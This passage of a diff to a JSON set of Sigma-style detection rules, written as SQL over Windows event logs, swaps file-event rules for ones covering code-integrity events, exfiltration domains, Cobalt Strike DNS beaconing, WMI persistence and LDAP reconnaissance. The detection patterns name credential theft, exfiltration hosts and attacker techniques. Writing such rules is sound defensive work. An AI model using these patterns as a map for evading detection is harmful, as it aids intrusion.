'%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", - "falsepositives": [ - "Application installation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "file_rename_win_not_dll_to_dll.yml" - }, - { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program 
Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND 
RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "status": "test", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "status": "experimental", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068" + "attack.t1546.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "status": "test", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", - "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') 
AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", - "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE 
'\\')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE 
'%.iso' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ], - "falsepositives": [ - "Unknown" + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' 
OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE 
'%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_ldap_recon.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE 
